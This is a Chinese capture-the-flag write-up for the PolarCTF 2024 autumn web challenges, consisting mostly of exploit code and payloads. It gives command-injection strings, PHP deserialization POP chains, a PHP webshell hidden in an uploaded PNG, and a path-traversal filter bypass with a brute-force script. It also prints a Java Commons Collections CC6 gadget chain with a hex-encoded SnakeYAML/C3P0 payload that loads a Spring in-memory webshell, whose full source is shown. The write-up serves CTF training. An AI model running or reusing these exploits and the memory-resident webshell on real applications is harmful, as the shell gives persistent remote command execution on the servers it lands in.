【Web】PolarCTF2024秋季个人挑战赛wp

EZ_Host

一眼丁真命令注入

payload:

?host=127.0.0.1;cat+f*

序列一下

exp:

<?php

class Polar{
    public $lt;
    public $b;
}
$p=new Polar();
$p->lt="system";
$p->b="tac /f*";
echo serialize($p);

payload:

x=O:5:"Polar":2:{s:2:"lt";s:6:"system";s:1:"b";s:7:"tac /f*";}

vm50给你flag

先读waf源码

?file=php://filter/convert.base64-encode/resource=funs.php

base64解码

<?php
include 'f1@g.php';
function myWaf($data)
{
    if (preg_match("/f1@g/i", $data)) {
        echo "NONONONON0!";
        return FALSE;
    } else {
        return TRUE;
    }
}

class A
{
    private $a;

    public function __destruct()
    {
        echo "A->" . $this->a . "destruct!";
    }
}

class B
{
    private $b = array();
    public function __toString()
    {
        $str_array= $this->b;
        $str2 = $str_array['kfc']->vm50;
        return "Crazy Thursday".$str2;
    }
}
class C{
    private $c = array();
    public function __get($kfc){
        global $flag;
        $f = $this->c[$kfc];
        var_dump($$f);
    }
}

exp:

<?php

class A
{
    public $a;
}

class B
{
    public $b;
}
class C{
    public $c;
}

//A#__destruct -> B#__toString -> C#__get
$c=new C();
$b=new B();
$a=new A();
$c->c=array("vm50"=>"flag");
$b->b=array("kfc"=>$c);
$a->a=$b;
echo serialize($a);

payload:

O:1:"A":1:{s:1:"a";O:1:"B":1:{s:1:"b";a:1:{s:3:"kfc";O:1:"C":1:{s:1:"c";a:1:{s:4:"vm50";s:4:"flag";}}}}}

Deserialize

访问./hidden

访问./hidden/hidden.php

exp

<?php

class Token {
    public $id;
    public $secret;
}

class User {
    public $name;
    public $isAdmin = false;
    public $token;
}

class Product {
    public $productName;
    public $price;
}

$c=new Product();
$b=new Token();
$a=new User();
$c->productName='1';
$c->price=1;
$b->product=$c;
$b->id=1;
$a->name="Z3r4y";
$a->token=$b;
$a->isAdmin=true;
echo serialize($a);

payload:

./hidden/hidden.php?data=O:4:"User":3:{s:4:"name";s:5:"Z3r4y";s:7:"isAdmin";b:1;s:5:"token";O:5:"Token":3:{s:2:"id";i:1;s:6:"secret";N;s:7:"product";O:7:"Product":2:{s:11:"productName";s:1:"1";s:5:"price";i:1;}}}

传马

上传一个png文件抓包改php后缀

访问传的马,RCE

bllbl_ser1

一开始给了php代码

exp:

<?php
class bllbl
{
    public $qiang;//我的强
}
class bllnbnl{
    public $er;//我的儿
}

$b=new bllbl();
$a=new bllnbnl();
$a->er="system('cat /f*');";
$b->qiang=$a;
echo serialize($b);

payload:

?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:18:"system('cat /f*');";}}

投喂

exp:

<?php
class User
{
    public $username;
    public $is_admin;
}

$a=new User();
$a->is_admin=true;
echo serialize($a);

payload:

data=O:4:"User":2:{s:8:"username";N;s:8:"is_admin";b:1;}

raoyiquan

payload:

?c.md=env

读环境变量偷鸡成功

但交了不对()

老老实实绕吧

payload:

?c.md=ta\c /fl\ag.php

1ncIud3

扫出来

?page=flag对应了./flag.php,文件后缀写死了是php

经过测试发现题目会将../替换为空,双写绕过可以目录穿越

?page=..././..././..././..././..././..././..././..././f14g

尝试爆破没结果

import requests
import itertools

# 定义字符和替换的映射,包括 F 大写和 g 替换成 9 的情况
replace_dict = {
    'l': ['1', 'I', 'L', 'l'],
    'a': ['3', '4', 'a', '@'],
    'F': ['F', 'f'],
    'g': ['g', '9']
}

# 目标字符串
original_string = "Flag"

# 找出需要替换的字符及其对应的位置
positions = [(i, char) for i, char in enumerate(original_string) if char in replace_dict]

# 生成所有可能的组合
possible_combinations = []
for combination in itertools.product(*[replace_dict[char] for _, char in positions]):
    temp_string = list(original_string)
    for (pos, _), replacement in zip(positions, combination):
        temp_string[pos] = replacement
    possible_combinations.append("".join(temp_string))

# 基础 URL 模板
base_url = "http://472bb567-85eb-4d41-b194-77ec77dd844e.www.polarctf.com:8090/?page=..././..././..././..././..././..././..././..././{}"

# 循环替换不同的 flag 变体并发起请求
for variant in possible_combinations:
    # 替换 URL 中的 Flag
    url = base_url.format(variant)
    
    try:
        # 发送 GET 请求
        response = requests.get(url)
        
        # 检查响应内容是否包含 "flag"
        if "flag" in response.text.lower():
            print(f"Found 'flag' in the response for variant: {variant}")
            print(f"Response Content:\n{response.text[:100]}")  # 输出前100字符
            print("-" * 80)  # 分隔符
        
    except Exception as e:
        # 捕获异常并打印
        print(f"Error with variant {variant}: {e}")

后面发现是,鉴定为傻逼题

?page=..././..././f1a9

笑傲上传

有一个后门

一句话木马插在准备好的图片末尾

cat yjh3.php >> 1.png

上传成功

文件包含RCE

/include.php?file=/var/www/html/upload/5420240921110122.png

SnakeYaml

不出网打hex

SnakeYaml反序列化分析 - F12~ - 博客园

自己也写过对应的文章,把fastjson换成snakeyaml就行【Web】浅聊Java反序列化之C3P0------不出网Hex字节码加载利用-CSDN博客

CC6打spring内存马

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class CC6WithTp {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class ct = templates.getClass();
        byte[] code = Files.readAllBytes(Paths.get("C:\\Users\\21135\\Desktop\\JeecgBoot-master\\polar\\target\\classes\\exp\\SpringControllerMemShell3.class"));
        byte[][] bytes = {code};
        Field ctDeclaredField = ct.getDeclaredField("_bytecodes");
        ctDeclaredField.setAccessible(true);
        ctDeclaredField.set(templates,bytes);
        Field nameField = ct.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"Z3");
        Field tfactory = ct.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer",null,null)
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);

        Map<Object,Object> map = new HashMap<>();
        Map<Object,Object> lazyMap = LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"aaa");
//
//        //查看构造函数,传入的key和value
        HashMap<Object, Object> map1 = new HashMap<>();
//        //map的固定语法,必须要put进去,这里的put会将链子连起来,触发命令执行
        map1.put(tiedMapEntry, "bbb");
        lazyMap.remove("aaa");

        Class c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap,chainedTransformer);

//
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(map1);

        serialize(map1);
    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("./cc6.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        Object object = objectInputStream.readObject();
        return object;
    }
}

内存马

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;

/**
 * 适用于 SpringMVC+Tomcat的环境,以及Springboot 2.x 环境.
 *   因此比 SpringControllerMemShell.java 更加通用
 *   Springboot 1.x 和 3.x 版本未进行测试
 */
@Controller
public class SpringControllerMemShell3 extends AbstractTranslet {

    public SpringControllerMemShell3() {
        try {
            WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
            RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
            Method method2 = SpringControllerMemShell3.class.getMethod("test");
            RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();

            Method getMappingForMethod = mappingHandlerMapping.getClass().getDeclaredMethod("getMappingForMethod", Method.class, Class.class);
            getMappingForMethod.setAccessible(true);
            RequestMappingInfo info =
                    (RequestMappingInfo) getMappingForMethod.invoke(mappingHandlerMapping, method2, SpringControllerMemShell3.class);

            SpringControllerMemShell3 springControllerMemShell = new SpringControllerMemShell3("aaa");
            mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
        } catch (Exception e) {

        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    public SpringControllerMemShell3(String aaa) {
    }

    @RequestMapping("/malicious")
    public void test() throws IOException {
        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
        try {
            String arg0 = request.getParameter("cmd");
            PrintWriter writer = response.getWriter();
            if (arg0 != null) {
                String o = "";
                ProcessBuilder p;
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
                } else {
                    p = new ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});
                }
                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
                o = c.hasNext() ? c.next() : o;
                c.close();
                writer.write(o);
                writer.flush();
                writer.close();
            } else {
                response.sendError(404);
            }
        } catch (Exception e) {
        }
    }
}

payload:

data=!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource%0AuserOverridesAsString%3A%20HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400036161617372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E000378707372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000949000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C00195F61636365737345787465726E616C5374796C6573686565747400124C6A6176612F6C616E672F537472696E673B4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00124C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF00740003616C6C70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E00200007870000015ECCAFEBABE0000003400F60A003B00800A008100820800830B008400850700860700870B0005008807008908006507008A0A000A008B07008C07008D0A000C008E0A0014008F0800490700900A000A00910A001100920700930A001100940700950800630A000800960A000600970700980700990A001B009A0A001B009B08009C0B009D009E0B009F00A00800A10800A20A00A300A40A002800A50800A60A002800A70700A80700A90800AA0800AB0A002700AC0800AD0800AE0700AF0A002700B00A00B100B20A002E00B30800B40A002E00B50A002E00B60A002E00B70A002E00B80A00B900BA0A00B900BB0A00B900B80B009F00BC0700BD0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010007636F6E746578740100374C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F5765624170706C69636174696F6E436F6E746578743B0100156D617070696E6748616E646C65724D617070696E670100544C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F616E6E6F746174696F6E2F526571756573744D617070696E6748616E646C65724D617070696E673B0100076D6574686F643201001A4C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100026D7301004E4C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F636F6E646974696F6E2F526571756573744D6574686F647352657175657374436F6E646974696F6E3B0100136765744D617070696E67466F724D6574686F64010004696E666F01003F4C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F3B010018737072696E67436F6E74726F6C6C65724D656D5368656C6C01001F4C6578702F537072696E67436F6E74726F6C6C65724D656D5368656C6C333B010001650100154C6A6176612F6C616E672F457863657074696F6E3B0100047468697301000D537461636B4D61705461626C650700890700980100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700BE0100104D6574686F64506172616D65746572730100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B010015284C6A6176612F6C616E672F537472696E673B29560100036161610100124C6A6176612F6C616E672F537472696E673B010004746573740100017001001A4C6A6176612F6C616E672F50726F636573734275696C6465723B0100016F010001630100134C6A6176612F7574696C2F5363616E6E65723B010004617267300100067772697465720100154C6A6176612F696F2F5072696E745772697465723B010007726571756573740100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010008726573706F6E73650100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0700BF0700C00700A90700C10700A80700AF0700C201001952756E74696D6556697369626C65416E6E6F746174696F6E730100384C6F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D617070696E673B01000576616C756501000A2F6D616C6963696F757301000A536F7572636546696C6501001E537072696E67436F6E74726F6C6C65724D656D5368656C6C332E6A61766101002B4C6F72672F737072696E676672616D65776F726B2F73746572656F747970652F436F6E74726F6C6C65723B0C003C003D0700C30C00C400C50100396F72672E737072696E676672616D65776F726B2E7765622E736572766C65742E44697370617463686572536572766C65742E434F4E544558540700C60C00C700C80100356F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F5765624170706C69636174696F6E436F6E746578740100526F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F616E6E6F746174696F6E2F526571756573744D617070696E6748616E646C65724D617070696E670C00C900CA01001D6578702F537072696E67436F6E74726F6C6C65724D656D5368656C6C3301000F6A6176612F6C616E672F436C6173730C00CB00CC01004C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F636F6E646974696F6E2F526571756573744D6574686F647352657175657374436F6E646974696F6E0100356F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D6574686F640C003C00CD0C00CE00CF0100186A6176612F6C616E672F7265666C6563742F4D6574686F640C00D000CC0C00D100D20100106A6176612F6C616E672F4F626A6563740C00D300D401003D6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F0C003C00620C00D500D60100136A6176612F6C616E672F457863657074696F6E0100406F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F536572766C657452657175657374417474726962757465730C00D700D80C00D900DA010003636D640700BF0C00DB00DC0700C00C00DD00DE0100000100076F732E6E616D650700DF0C00E000DC0C00E100E201000377696E0C00E300E40100186A6176612F6C616E672F50726F636573734275696C6465720100106A6176612F6C616E672F537472696E67010007636D642E6578650100022F630C003C00E50100072F62696E2F73680100022D630100116A6176612F7574696C2F5363616E6E65720C00E600E70700E80C00E900EA0C003C00EB0100025C410C00EC00ED0C00EE00EF0C00F000E20C00F1003D0700C10C00F200620C00F3003D0C00F400F5010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C6574010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E0100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100136A6176612F696F2F5072696E745772697465720100136A6176612F696F2F494F457863657074696F6E01003C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F52657175657374436F6E74657874486F6C64657201001863757272656E74526571756573744174747269627574657301003D28294C6F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F52657175657374417474726962757465733B0100396F72672F737072696E676672616D65776F726B2F7765622F636F6E746578742F726571756573742F526571756573744174747269627574657301000C676574417474726962757465010027284C6A6176612F6C616E672F537472696E673B49294C6A6176612F6C616E672F4F626A6563743B0100076765744265616E010025284C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F4F626A6563743B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B01003B285B4C6F72672F737072696E676672616D65776F726B2F7765622F62696E642F616E6E6F746174696F6E2F526571756573744D6574686F643B2956010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0100116765744465636C617265644D6574686F6401000D73657441636365737369626C65010004285A2956010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B01000F72656769737465724D617070696E6701006E284C6F72672F737072696E676672616D65776F726B2F7765622F736572766C65742F6D76632F6D6574686F642F526571756573744D617070696E67496E666F3B4C6A6176612F6C616E672F4F626A6563743B4C6A6176612F6C616E672F7265666C6563742F4D6574686F643B295601000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B01000B676574526573706F6E736501002A28294C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B01000C676574506172616D65746572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B01000967657457726974657201001728294C6A6176612F696F2F5072696E745772697465723B0100106A6176612F6C616E672F53797374656D01000B67657450726F706572747901000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A010016285B4C6A6176612F6C616E672F537472696E673B2956010005737461727401001528294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100076861734E65787401000328295A0100046E657874010005636C6F73650100057772697465010005666C75736801000973656E644572726F720100042849295600210008003B0000000000050001003C003D0001003E0000015400060008000000882AB70001B80002120303B900040300C000054C2B1206B900070200C000064D1208120903BD000AB6000B4EBB000C5903BD000DB7000E3A042CB6000F121005BD000A59031211535904120A53B600123A05190504B6001319052C05BD001459032D535904120853B60015C000163A06BB0008591217B700183A072C190619072DB60019A700044CB10001000400830086001A0003003F0000003A000E0000001F0004002100130022001F0023002B002400380026005100270057002800670029006F002B007A002C0083002F0086002D0087003000400000005C000900130070004100420001001F0064004300440002002B00580045004600030038004B00470048000400510032004900460005006F0014004A004B0006007A0009004C004D000700870000004E004F0001000000880050004D00000051000000100002FF008600010700520001070053000001005400550003003E0000003F0000000300000001B100000002003F000000060001000000350040000000200003000000010050004D00000000000100560057000100000001005800590002005A000000040001005B005C0000000902005600000058000000010054005D0003003E000000490000000400000001B100000002003F0000000600010000003A00400000002A0004000000010050004D00000000000100560057000100000001005E005F000200000001006000610003005A000000040001005B005C0000000D0300560000005E0000006000000001003C00620002003E0000003D00010002000000052AB70001B100000002003F0000000A00020000003C0004003D0040000000160002000000050050004D000000000005006300640001005C00000005010063000000010065003D0003003E000001E100060008000000CDB80002C0001BC0001BB6001C4CB80002C0001BC0001BB6001D4D2B121EB9001F02004E2CB9002001003A042DC6009312213A051222B80023B600241225B60026990021BB00275906BD002859031229535904122A5359052D53B7002B3A06A7001EBB00275906BD00285903122C535904122D5359052D53B7002B3A06BB002E591906B6002FB60030B700311232B600333A071907B6003499000B1907B60035A7000519053A051907B6003619041905B600371904B600381904B60039A7000C2C110194B9003A0200A700044EB10001001A00C800CB001A0003003F00000052001400000041000D0042001A004400230045002B0046002F0047003300490043004A0061004C007C004E0092004F00A6005000AB005100B2005200B7005300BC005400BF005500C8005800CB005700CC0059004000000066000A005E000300660067000600330089006800640005007C00400066006700060092002A0069006A0007002300A5006B00640003002B009D006C006D000400CC0000004E004F0003000000CD0050004D0000000D00C0006E006F0001001A00B30070007100020051000000360008FF006100060700520700720700730700740700750700740000FC001A070076FC002507007741070074F8001AF900084207005300005A000000040001007800790000000E0001007A0001007B5B000173007C0002007D00000002007E0079000000060001007F0000707400025A3370770100787372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D6571007E00125B000B69506172616D547970657371007E001578707074000E6E65775472616E73666F726D6572707371007E00003F4000000000000C77080000001000000000787874000362626278%3B%0A
相关推荐
centos0810 小时前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
__AtYou__13 小时前
Golang | Leetcode Golang题解之第535题TinyURL的加密与解密
leetcode·golang·题解
Sweet_vinegar14 小时前
变异凯撒(Crypto)
算法·安全·ctf·buuctf
lunjiahao16 小时前
GJ Round (2024.10) Round 8~21
笔记·题解·杂题
细心的莽夫16 小时前
JavaWeb学习笔记
java·开发语言·笔记·学习·java-ee·web
Mr_Fmnwon16 小时前
【我的 PWN 学习手札】House of Roman
pwn·ctf·heap
XuYueming18 小时前
[NOIP2022] 比赛 随机排列 部分分
数学·线段树·题解·单调栈·洛谷·扫描线·二维数点·部分分·概率 & 期望
kali-Myon19 小时前
NewStarCTF2024-Week5-Web&Misc-WP
前端·python·学习·mysql·web安全·php·web
觅_21 小时前
HTML 鼠标滑动 页面的header背景从透明色变为黑色
前端·html·web
__AtYou__21 小时前
Golang | Leetcode Golang题解之第541题反转字符串II
leetcode·golang·题解